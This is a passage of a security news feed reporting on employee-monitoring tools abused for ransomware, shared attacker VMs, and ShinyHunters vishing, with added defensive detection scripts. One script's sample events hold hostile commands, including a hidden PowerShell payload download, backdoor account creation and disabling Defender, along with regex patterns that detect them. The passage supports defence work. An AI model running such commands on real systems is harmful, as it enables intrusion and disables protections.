                                                                        <pubDate>Mon, 16 Feb 2026 11:10:15 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/4w6boC4sd6Rmk2mt6aw3Ud-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Cyber crime concept image showing hacker typing on keyboard in dimly-lit room with tablet pictured on desk. ]]></media:description>                                                            <media:text><![CDATA[Cyber crime concept image showing hacker typing on keyboard in dimly-lit room with tablet pictured on desk. ]]></media:text>
                                <media:title type="plain"><![CDATA[Cyber crime concept image showing hacker typing on keyboard in dimly-lit room with tablet pictured on desk. ]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/4w6boC4sd6Rmk2mt6aw3Ud-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Attackers are abusing a popular workforce monitoring tool as a foothold for <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware </a>attacks.</p><p>Net Monitor for Employees Professional is a staff productivity tracking tool from NetworkLookout, with features including reverse shell connections, <a href="https://www.itpro.com/mobile/remote-access/368104/what-is-a-remote-desktop">remote desktop</a> control, <a href="https://www.itpro.com/software/29733/best-document-management-software">file management</a>, and the ability to customize service and process names during installation. </p><p>In late January and early February, Huntress <a href="https://www.huntress.com/blog/employee-monitoring-simplehelp-abused-in-ransomware-operations"><u>said </u></a>its Tactical Response team spotted two separate intrusions in which threat actors chained Net Monitor with SimpleHelp in attempted ransomware attacks. </p><p>SimpleHelp is a legitimate remote monitoring and management (RMM) platform widely used by IT teams and managed service providers. </p><p>"Shared infrastructure, overlapping IOCs, and consistent tradecraft across both cases strongly suggest a single threat actor or group behind this activity," researchers said.</p><p>The threat actors used Net Monitor for Employees as their primary remote access channel, with SimpleHelp as a redundant persistence layer. Because both are legitimate, commercially available tools, the traffic blended in with normal administrative activity, ultimately leading to the attempted – but on these occasions unsuccessful – deployment of Crazy ransomware. 
</p><p>"Threat actors leveraged this capability for hands-on-keyboard reconnaissance, additional tooling delivery, and deploying secondary remote access channels, effectively turning an employee monitoring tool into a fully functional <a href="https://www.itpro.com/security/30081/what-is-a-trojan-virus">RAT (remote access trojan)</a>," said the team.</p><p>In the first case, it's not clear how the attackers gained initial access, but once inside they enumerated user accounts, attempted to change passwords, and created new accounts. Huntress observed the Net Monitor for Employees terminal pulling down a file via PowerShell that turned out to be the SimpleHelp agent.</p><p>Attempts to tamper with Windows Defender and to deploy several versions of Crazy ransomware failed.</p><p>In the second case, the threat actor used a compromised vendor's SSL VPN account to gain initial access, then launched an interactive PowerShell session to begin staging their tooling.</p><p>They installed SimpleHelp and configured it to monitor for certain keywords. 
</p><p>"Interestingly enough, the SimpleHelp agent was also configured with keyword-based monitoring triggers via GlobalEvents, revealing the threat actor's financial motivation," said the team.</p><p>These included wallet services (metamask, exodus, wallet, blockchain), exchanges (binance, bybit, kucoin, bitrue, poloniex, bc.game, noones), blockchain explorers (etherscan, bscscan), and the payment platform payoneer.</p><h2 id="how-enterprises-can-shore-up-defenses">How enterprises can shore up defenses</h2><p>Huntress recommends multi-factor authentication (MFA) on all remote access services, administrative accounts, and external-facing applications, together with the principle of least privilege.</p><p>Networks should be logically segmented to limit lateral movement, and all external-facing applications and devices - especially VPN and RDP gateways - should be patched immediately and monitored for anomalous login attempts.</p><p>Third-party software should be audited regularly, with user permissions kept to a minimum. Huntress also said enterprises should monitor for unusual process execution chains and configure alerts for any attempt to modify or disable security software.</p><p>Huntress warned these cases highlight a growing trend of threat actors leveraging legitimate, commercially available software to blend into enterprise environments. </p><p>"Net Monitor for Employees Professional, while marketed as a workforce monitoring tool, provides capabilities that rival traditional remote access trojans: reverse connections over common ports, process and service name masquerading, built-in shell execution, and the ability to silently deploy via standard Windows installation mechanisms," they wrote. 
</p><p>"When paired with SimpleHelp as a secondary access channel, complete with keyword-based monitoring triggers targeting cryptocurrency activity, the result is a resilient, dual-tool foothold that is difficult to distinguish from legitimate administrative software."</p>
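<p>The "unusual process execution chains" Huntress recommends watching for can be expressed as a handful of behavioural rules. The script below is an added example written for this page, not Huntress's tooling or anything from NetworkLookout or SimpleHelp. It runs those rules over constructed Sysmon-style process-creation events; the agent path <code>C:\Program Files\MonitorAgent\agent.exe</code>, the list of parents expected to spawn shells and the rule names are all assumptions. Because the article notes the monitoring agent's process and service names can be customized at install time, the rules key on what the child process does (download cradle, Defender tampering, account creation, a system binary name outside C:\Windows) and on which parents normally launch a shell, rather than on the agent's name.</p>

```python
"""Flag suspicious process-execution chains of the kind Huntress describes.

Added example, not Huntress's code. It runs behavioural rules over
constructed Sysmon-style process-creation events (parent image, image,
command line). The monitoring agent can be renamed at install time, so
the rules key on what the child does and on which parents normally
spawn shells, not on the agent's name. "C:\\Program Files\\MonitorAgent\\
agent.exe" is a hypothetical path.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Parents that routinely spawn shells on a workstation (assumption; tune per estate).
EXPECTED_SHELL_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "services.exe"}
# Names attackers masquerade as; any of these running outside C:\Windows is suspect.
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe"}
SYSTEM_DIR = "c:\\windows\\"

DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile\(|downloadstring\(|start-bitstransfer"
    r"|\bcurl(\.exe)?\b|\bwget\b|certutil(\.exe)?\s+-urlcache|\bhttps?://", re.I)
DEFENDER_TAMPER_RE = re.compile(
    r"set-mppreference\s+-(disable\w+|exclusion\w+)|add-mppreference\s+-exclusion\w+"
    r"|\bsc(\.exe)?\s+(stop|config|delete)\s+windefend\b|DisableAntiSpyware", re.I)
ACCOUNT_RE = re.compile(
    r"\bnet1?(\.exe)?\s+user\s+\S+\s+(/add\b|[^/\s]+)"   # net user <name> /add | <name> <pwd>
    r"|New-LocalUser|Set-LocalUser\b.*-Password|Add-LocalGroupMember", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return the list of rule names an event trips (empty when benign)."""
    parent, child, cmd = basename(ev.parent_image), basename(ev.image), ev.command_line
    findings = []
    if child in SHELLS and parent not in EXPECTED_SHELL_PARENTS:
        findings.append("shell-from-unusual-parent")      # e.g. an RMM or monitoring agent
    if child in SHELLS and DOWNLOAD_RE.search(cmd):
        findings.append("download-cradle")                # tooling delivery, as with SimpleHelp
    if DEFENDER_TAMPER_RE.search(cmd):
        findings.append("defender-tamper")
    if ACCOUNT_RE.search(cmd):
        findings.append("account-manipulation")
    if child in SYSTEM_NAMES and not ev.image.lower().startswith(SYSTEM_DIR):
        findings.append("system-name-masquerade")
    return findings


def scan(events):
    """Return (host, child process, findings) for every event that trips a rule."""
    return [(ev.host, basename(ev.image), f) for ev in events if (f := classify(ev))]


SAMPLE_EVENTS = [  # constructed telemetry, not from any real incident
    ProcEvent("WS01", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile Get-ChildItem C:\\Reports"),
    ProcEvent("WS01", r"C:\Program Files\MonitorAgent\agent.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "Invoke-WebRequest http://203.0.113.10/rmm.exe '
              '-OutFile C:\\Users\\Public\\rmm.exe"'),
    ProcEvent("WS01", r"C:\Program Files\MonitorAgent\agent.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c net user svc_backup Winter2026! /add"),
    ProcEvent("SRV02", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"),
    ProcEvent("SRV02", r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs"),
    ProcEvent("SRV02", r"C:\Users\Public\installer.exe", r"C:\Users\Public\svchost.exe",
              "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for host, proc, findings in scan(SAMPLE_EVENTS):
        print(f"{host}: {proc} -> {', '.join(findings)}")
```

<p>Run stand-alone it reports four of the six constructed events: the agent-spawned PowerShell download, the agent-spawned account creation, the Defender tampering, and the svchost.exe running from a user-writable directory. The benign explorer-launched PowerShell and the real svchost.exe produce no findings. In a SIEM the same rules would run against Sysmon event 1 or Windows 4688 records, with the parent allow-list tuned to the estate's own RMM tooling.</p>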
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Ransomware gangs are sharing virtual machines to wage cyber attacks on the cheap – but it could be their undoing ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/ransomware-gangs-are-sharing-virtual-machines-to-wage-cyber-attacks-on-the-cheap-but-it-could-be-their-undoing</link>
                                                                            <description>
                            <![CDATA[ Thousands of attacker servers all had the same autogenerated Windows hostnames, according to Sophos ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">zLwJpcY9ZvURVNVFjzut46</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/YDWujEWW55Zc2hfESYZWb4-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 05 Feb 2026 10:20:10 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/YDWujEWW55Zc2hfESYZWb4-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Ransomware concept image showing computer screen with binary code, with a skull imprinted over code.]]></media:description>                                                            <media:text><![CDATA[Ransomware concept image showing computer screen with binary code, with a skull imprinted over code.]]></media:text>
                                <media:title type="plain"><![CDATA[Ransomware concept image showing computer screen with binary code, with a skull imprinted over code.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/YDWujEWW55Zc2hfESYZWb4-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Ransomware gangs are renting cheap virtual machines (VMs) rather than building their own servers, with thousands effectively sharing the same infrastructure.</p><p>Analysis from Sophos found criminals are leasing VMs from bulletproof hosting (BPH) services like MasterRDP, built on the legitimate ISPsystem virtualization platform.</p><p>The advantage of this strategy is that it allows hackers to scale operations, remain anonymous, and keep activities running. Even if one server is taken down, hundreds just like it still exist.</p><p>Sophos <a href="https://www.sophos.com/en-us/blog/malicious-use-of-virtual-machine-infrastructure" target="_blank"><u>uncovered the practice</u></a> while investigating multiple WantToCry ransomware incidents. It found that the attacker servers all had the same autogenerated Windows hostnames, which kept appearing across incidents and in multiple countries.</p><p>The team found more than 7,000 servers in the wild sharing a single hostname, many of which appeared to originate from Russia, Europe, the US, and even Iran and Israel. </p><p>"Based on CTU and third-party observations, the two hostnames used in the WantToCry ransomware activity (WIN-J9D866ESIJ2 and WIN-LIVFRVQFMKO) have been used in multiple incidents," the Sophos Counter Threat Unit Research Team said.</p><p>"This malicious activity includes cybercriminal attacks involving LockBit, Qilin, and <a href="https://www.itpro.com/security/ransomware/everything-we-know-so-far-about-the-rumored-alphv-takedown">BlackCat </a>(also known as ALPHV) ransomware, and an additional deployment of NetSupport RAT." 
</p><p>This infrastructure is commonly used to support ransomware command and control (C2) servers, <a href="https://www.itpro.com/malware/28076/what-is-malware">malware </a>distribution, <a href="https://www.itpro.com/security/29093/what-is-phishing">phishing </a>campaigns, <a href="https://www.itpro.com/botnets/1644/what-is-a-botnet">botnet </a>management, and data exfiltration staging. </p><p>The practice appears to have been going on for at least five years, researchers noted.</p><h2 id="cheaper-attacks-but-easier-to-track">Cheaper attacks, but easier to track</h2><p>Crucially, the reuse of VM hostnames gives defenders a pivot. Thousands of ISPsystem VMs share the same static hostnames, many of them linked to ransomware and malware campaigns, so a hostname recorded in one intrusion can be matched against others to tie separate incidents to common infrastructure.</p><p>Most affected VMs are hosted by a small set of providers, some of which are tied to state-sponsored hacker or cyber criminal activity.</p><p>"While there is likely to be some legitimate activity originating from virtual machines with these hostnames from these hosting providers, there is additional data that links the top two providers (Stark Industries Solutions Ltd and First Server Limited) to cybercriminal and Russian state-sponsored operations," the researchers said.</p><p>"CTU and third-party researchers have observed multiple state-sponsored and cybercriminal threat groups use Stark Industries Solutions Ltd infrastructure since its founding in February 2022, just before Russia’s invasion of Ukraine." 
</p><h2 id="cyber-crime-infrastructure-takedowns-continue">Cyber crime infrastructure takedowns continue</h2><p>In May last year, the European Council issued “restrictive measures” against Stark Industries Solutions and its operators for enabling various Russian state-sponsored and affiliated actors to conduct destabilizing activities.</p><p>Meanwhile, First Server Limited appears to be closely connected to Doppelganger, a Russian disinformation campaign whose operators and associated entities were sanctioned by the UK government in October 2024. </p><p>Sophos said it’s highly likely that MasterRDP is just one of many BPH providers leasing ISPsystem virtual machines hosted on abuse-tolerant infrastructure to customers with malicious intentions, including those engaged in ransomware operations and malware delivery.</p><p>"ISPsystem VMmanager is a legitimate commercial virtualization management platform widely used across the hosting industry, and the software itself is not malicious," researchers said.</p><p>"However, its low cost, low barrier to entry, and turnkey deployment capabilities make it attractive to cybercriminals while its widespread legitimate use provides operational cover among thousands of compliant deployments."</p>
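<p>The hostname pivot Sophos describes is easy to reproduce in an incident-response team's own data. The script below is an added example for this page, not Sophos or CTU code. It assumes a fresh Windows install names itself <code>WIN-</code> followed by 11 alphanumeric characters, and works over constructed, flattened Windows 4624 (successful logon) records in which the Workstation Name and Source Network Address fields carry the attacker-side hostname and IP; the incident and country tags are what an IR team would attach per case. The two hostnames from the article are reused as sample values; the incident IDs, IPs and other hostnames are made up.</p>

```python
"""Pivot on reused, autogenerated Windows hostnames across incidents.

Added example, not Sophos's code. A fresh Windows install names itself
"WIN-" followed by 11 alphanumeric characters (pattern assumed here);
Sophos saw two such names, WIN-J9D866ESIJ2 and WIN-LIVFRVQFMKO, recur
on attacker VMs. The log lines are constructed, flattened Windows 4624
(successful logon) records: WorkstationName and SourceIP carry the
attacker side, incident and country are per-case tags.
"""
import re
from collections import defaultdict

AUTOGEN_HOST_RE = re.compile(r"^WIN-[A-Z0-9]{11}$")
KV_RE = re.compile(r"(\w+)=(\S+)")

SAMPLE_LOGS = [  # constructed, not real telemetry
    "incident=INC-101 country=DE EventID=4624 LogonType=10 Account=jsmith WorkstationName=WIN-J9D866ESIJ2 SourceIP=198.51.100.23",
    "incident=INC-101 country=DE EventID=4624 LogonType=10 Account=svc_backup WorkstationName=WIN-J9D866ESIJ2 SourceIP=198.51.100.23",
    "incident=INC-205 country=US EventID=4624 LogonType=10 Account=administrator WorkstationName=WIN-J9D866ESIJ2 SourceIP=203.0.113.77",
    "incident=INC-309 country=FR EventID=4624 LogonType=10 Account=it.admin WorkstationName=WIN-LIVFRVQFMKO SourceIP=203.0.113.12",
    "incident=INC-309 country=FR EventID=4624 LogonType=3 Account=it.admin WorkstationName=LAPTOP-ITADMIN SourceIP=10.0.5.14",
    "incident=INC-411 country=GB EventID=4624 LogonType=10 Account=helpdesk WorkstationName=WIN-LIVFRVQFMKO SourceIP=198.51.100.90",
    "incident=INC-411 country=GB EventID=4624 LogonType=10 Account=helpdesk WorkstationName=WIN-7Q2ZP3K8M1A SourceIP=10.0.9.21",
]


def parse(line):
    """Turn one flattened key=value log line into a dict."""
    return dict(KV_RE.findall(line))


def cluster_by_hostname(lines):
    """Group successful-logon observations by the client workstation name."""
    clusters = defaultdict(lambda: {"incidents": set(), "countries": set(), "source_ips": set()})
    for rec in map(parse, lines):
        if rec.get("EventID") != "4624":
            continue
        c = clusters[rec["WorkstationName"]]
        c["incidents"].add(rec["incident"])
        c["countries"].add(rec["country"])
        c["source_ips"].add(rec["SourceIP"])
    return clusters


def shared_infrastructure(lines, min_incidents=2):
    """Autogenerated hostnames seen in at least min_incidents distinct incidents, most shared first.

    One autogenerated name on its own is just a fresh install; the same name
    across unrelated victims in different countries is the rented-VM signal.
    """
    hits = []
    for host, c in cluster_by_hostname(lines).items():
        if AUTOGEN_HOST_RE.match(host) and len(c["incidents"]) >= min_incidents:
            hits.append((host, sorted(c["incidents"]), sorted(c["countries"]), sorted(c["source_ips"])))
    return sorted(hits, key=lambda h: (-len(h[1]), h[0]))


if __name__ == "__main__":
    for host, incidents, countries, ips in shared_infrastructure(SAMPLE_LOGS):
        print(f"{host}: {len(incidents)} incidents {incidents} countries={countries} ips={ips}")
```

<p>On the sample data both article hostnames surface, each tied to two incidents in two countries and two source addresses, while the one-off autogenerated name and the admin's laptop are left alone. The same grouping applied to RDP gateway, VPN and SMB logs across cases is how a hostname becomes an indicator that outlives any single server takedown.</p>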
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Google issues warning over ShinyHunters-branded vishing campaigns ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/google-issues-warning-over-shinyhunters-branded-vishing-campaigns</link>
                                                                            <description>
                            <![CDATA[ Related groups are stealing data through voice phishing  and fake credential harvesting websites ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">zHr8MESTqLrM7FdPM6unGB</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/6UMt7L8cwrivqQPjJWN3eX-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 04 Feb 2026 08:30:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/6UMt7L8cwrivqQPjJWN3eX-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Device code phishing concept image showing cartoon cell phone with a hook attached to a sign-in page. ]]></media:description>                                                            <media:text><![CDATA[Device code phishing concept image showing cartoon cell phone with a hook attached to a sign-in page. ]]></media:text>
                                <media:title type="plain"><![CDATA[Device code phishing concept image showing cartoon cell phone with a hook attached to a sign-in page. ]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/6UMt7L8cwrivqQPjJWN3eX-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Google Threat Intelligence Group (GTIG) has identified a group with all the hallmarks of ShinyHunters using <a href="https://www.itpro.com/security/cyber-attacks/phishing-tactics-the-top-attacks-trends-in-year">voice phishing</a> (vishing) and fake credential harvesting websites to steal sensitive data. </p><p>In an advisory, the tech giant warned the group primarily gains access to corporate environments by obtaining single sign-on (SSO) credentials and <a href="https://www.itpro.com/security/cyber-security/369745/what-is-mfa-fatigue">multi-factor authentication (MFA)</a> codes. </p><p>Once inside, the attackers target cloud-based SaaS applications to exfiltrate sensitive data and internal communications that they can use in subsequent extortion demands.</p><p>Google is currently <a href="https://cloud.google.com/blog/topics/threat-intelligence/expansion-shinyhunters-saas-data-theft" target="_blank"><u>tracking</u></a> the activity under several threat clusters, including UNC6661, UNC6671, and UNC6240.</p><p>Last month, for example, UNC6661 pretended to be IT staff and called employees at targeted organisations, claiming that the company was updating MFA settings. </p><p>The threat actor then directed employees to victim-branded credential harvesting sites that captured their credentials and MFA codes, and used those to register a device under the attacker's control for MFA. </p><p>According to Google, threat actors moved laterally through victims' environments to exfiltrate data from various <a href="https://www.itpro.com/cloud/software-as-a-service-saas/362655/what-is-saas">SaaS </a>platforms.</p><p>While the attacks are targeted, analysis suggests that subsequent access is probably opportunistic, determined by the specific permissions and applications accessible via the individual compromised SSO session. Google stressed that the activity isn't the result of a security vulnerability in vendors' products or infrastructure. 
</p><p>"In some cases, they have appeared to target specific types of information. For example, the threat actors have conducted searches in cloud applications for documents containing specific text including 'poc', 'confidential', 'internal', 'proposal', 'salesforce', and 'vpn' or targeted personally identifiable information (PII) stored in Salesforce," researchers said. </p><p>"Additionally, UNC6661 may have targeted Slack data at some victims' environments, based on a claim made in a ShinyHunters-branded data leak site (DLS) entry."</p><h2 id="valuable-intelligence">Valuable intelligence</h2><p>Cory Michal, CSO at AppOmni, praised the level of operational detail in the report, and particularly the volume and specificity of indicators of compromise that weren’t previously public.</p><p>This intelligence could prove vital for organizations that find themselves in the crosshairs, Michal noted.</p><p>“Publishing concrete domains, tooling names/artifacts, and workflow-level signals gives defenders something they can deploy immediately at scale (email/web filtering, OAuth/app controls, identity telemetry detections, and retro-hunting),” he said.</p><p>“It helps the ecosystem disrupt infrastructure and tradecraft faster by enabling consistent blocking and takedown actions across many organizations rather than each team rediscovering the same indicators in isolation.”</p><h2 id="what-can-enterprises-do-to-protect-themselves">What can enterprises do to protect themselves?</h2><p>Google has published <a href="https://cloud.google.com/blog/topics/threat-intelligence/defense-against-shinyhunters-cybercrime-saas" target="_blank"><u>guidance</u></a> on hardening, logging, and detection against the threats. </p><p>Organizations responding to an active incident should focus on rapid containment steps, such as severing access to infrastructure environments, SaaS platforms, and the specific identity stores typically used for lateral movement and persistence. 
</p><p>Long-term defense, meanwhile, requires a transition toward phishing-resistant MFA, such as FIDO2 security keys or passkeys. Because these are bound to the legitimate site's origin, a login cannot be relayed through a look-alike page, which makes them far more resistant to <a href="https://www.itpro.com/security/phishing/why-social-engineering-is-such-a-problem-and-how-your-business-can-protect-itself">social engineering</a> than push-based or SMS authentication.</p><p>“Companies should treat this as both a hunt and prevent problem: First, take the IoCs in the report and run them through your detection-and-response workflows (SIEM/SOAR, email security, web proxy/DNS, EDR, and SaaS audit logs) to identify any historical or active exposure,” Michal added. </p><p>He also said organizations should continuously monitor for look-alike domain registrations that incorporate their company name or the brands they use for login, support, and HR. </p><p>“In many of these campaigns, those newly registered domains are a leading indicator: they show up before the first vishing call, so catching and blocking them early (and tightening your help desk/MFA enrollment controls in parallel) can meaningfully reduce the chance the intrusion ever gets to the ‘mass download and extortion’ stage,” he said.</p>
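<p>The look-alike domain monitoring Michal describes can be scripted against a newly-registered-domains feed. The script below is an added example for this page, not Google's or AppOmni's code. The company name <code>examplecorp</code>, its owned domains, the keyword list and every domain in the feed are hypothetical. It scores each new registration on three signals: the company name appears in the registrable label; that label also carries an identity or help-desk keyword (the "victim-branded" pattern from the article); or the label is within two edits of the real one (a typosquat). Public-suffix handling is deliberately simplified to a short hard-coded list.</p>

```python
"""Flag newly registered look-alike domains for a company brand.

Added example, not Google's or AppOmni's code. It scores a constructed
feed of newly registered domains against a hypothetical company name
("examplecorp") and the login, support and HR brands it uses. Signals:
the brand in the registrable label, brand plus an identity keyword, or
a label within two edits of the real one.
"""
import re

COMPANY = "examplecorp"                                   # hypothetical target brand
REAL_DOMAINS = {"examplecorp.com", "examplecorp.co.uk"}   # owned domains, never flagged
LOGIN_BRANDS = {"okta", "sso", "login", "signin", "mfa", "vpn", "helpdesk",
                "support", "it", "hr", "workday", "payroll"}


def levenshtein(a, b):
    """Edit distance between two strings (standard two-row dynamic programme)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(domain):
    """Second-level label; two-part suffixes such as co.uk come from a short hard-coded
    list (a simplification; a public-suffix library would be used in production)."""
    parts = domain.lower().strip(".").split(".")
    if len(parts) >= 3 and parts[-2] in {"co", "com", "org", "ac", "gov"} and len(parts[-1]) == 2:
        return parts[-3]
    return parts[-2] if len(parts) >= 2 else parts[0]


def score(domain):
    """Return (score, reasons) for one domain; a score of 0 means nothing suspicious."""
    if domain.lower() in REAL_DOMAINS:
        return 0, []
    label = registrable_label(domain)
    tokens = set(re.split(r"[-_]", label))            # hyphenated words in the label
    rest = label.replace(COMPANY, "").strip("-_")     # what is left once the brand is removed
    points, reasons = 0, []
    if COMPANY in label:
        points += 2
        reasons.append("brand-in-label")
        if (tokens & LOGIN_BRANDS) or rest in LOGIN_BRANDS:
            points += 3
            reasons.append("brand+identity-keyword")
    elif 0 < levenshtein(label, COMPANY) <= 2:
        points += 3
        reasons.append("typosquat")
    return points, reasons


def triage(feed):
    """Flagged (domain, score, reasons) from a newly-registered-domains feed, highest score first."""
    scored = [(d, *score(d)) for d in feed]
    return sorted([f for f in scored if f[1] > 0], key=lambda f: (-f[1], f[0]))


NRD_FEED = [  # constructed feed; none of these are real registrations
    "examplecorp-sso.com",          # brand + identity keyword
    "okta-examplecorp.net",
    "exampiecorp.com",              # 'l' swapped for 'i'
    "examplecorp.net",              # TLD variant of the real domain
    "examplecorp-helpdesk.co.uk",
    "sso-portal.example",           # generic, not ours
    "examplecorp.com",              # the real domain, must not be flagged
    "bestrecipes.org",
]

if __name__ == "__main__":
    for domain, points, reasons in triage(NRD_FEED):
        print(f"{points:>2}  {domain:<28} {', '.join(reasons)}")
```

<p>The three brand-plus-keyword registrations score highest, the typosquat next, and the bare TLD variant last; the genuine domain and the unrelated ones are not flagged. Feeding the output into DNS and web-proxy blocklists, and into a watch on the help desk's MFA enrolment queue, is the early-blocking step Michal describes.</p>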
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ The FBI has seized the RAMP hacking forum, but will the takedown stick? History tells us otherwise ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/cyber-crime/the-fbi-has-seized-the-ramp-hacking-forum-but-will-the-takedown-stick-history-tells-us-otherwise</link>
                                                                            <description>
                            <![CDATA[ Billing itself as the “only place ransomware allowed", RAMP catered mainly for Russian-speaking cyber criminals ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">9MuHqZhvZQ6Bwhq8kvCxDk</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/RSjE8LWxBzgjnadXPUW8mB-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 30 Jan 2026 10:56:12 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cyber Crime]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/RSjE8LWxBzgjnadXPUW8mB-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Hacker concept image showing a silhouetted person in a black hat with binary code in background. ]]></media:description>                                                            <media:text><![CDATA[Hacker concept image showing a silhouetted person in a black hat with binary code in background. ]]></media:text>
                                <media:title type="plain"><![CDATA[Hacker concept image showing a silhouetted person in a black hat with binary code in background. ]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/RSjE8LWxBzgjnadXPUW8mB-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The FBI has seized the clearnet and <a href="https://www.itpro.com/security/32117/what-is-the-dark-web">dark web</a> domains of the RAMP underground hacking forum, used by <a href="https://www.itpro.com/security/29332/the-rise-of-ransomware-as-a-service">Ransomware as a Service (RaaS)</a> gangs and other cyber criminals.</p><p>While there's no official statement as yet, the domains now display banners reading "The Federal Bureau of Investigation has seized RAMP." </p><p>The notice adds that the action was carried out in coordination with the US Attorney's Office for the Southern District of Florida and the Computer Crime and Intellectual Property Section of the Department of Justice.</p><p>The takedown also appears to be confirmed by "Stallman", said to be one of RAMP's owners, in an XSS hacking forum post translated from Russian and <a href="https://x.com/DarkWebInformer/status/2016545523608539381" target="_blank"><u>shared on X</u></a>.</p><p>"With regret, I inform you that law enforcement agencies have gained control over the Ramp forum," it reads. </p><p>"Despite the fact that I no longer control Ramp and will not be creating a new forum from scratch, I will continue to buy accesses,” the statement adds. “My core business remains unchanged. If you have something you can offer me, the terms are listed in my signature, message me in private messages, and we will exchange via Jabber/Tox."</p><h2 id="what-you-need-to-know-about-ramp">What you need to know about RAMP</h2><p>RAMP - which originally stood for Russian Anonymous Marketplace - was a highly popular dark web forum that catered mainly for Russian-speaking cyber criminals, including RaaS gangs and initial access brokers. </p><p>It billed itself as the “only place ransomware allowed", and ransomware groups including Qilin, LockBit, DragonForce, RansomHub, and ALPHV/BlackCat promoted their RaaS services there. 
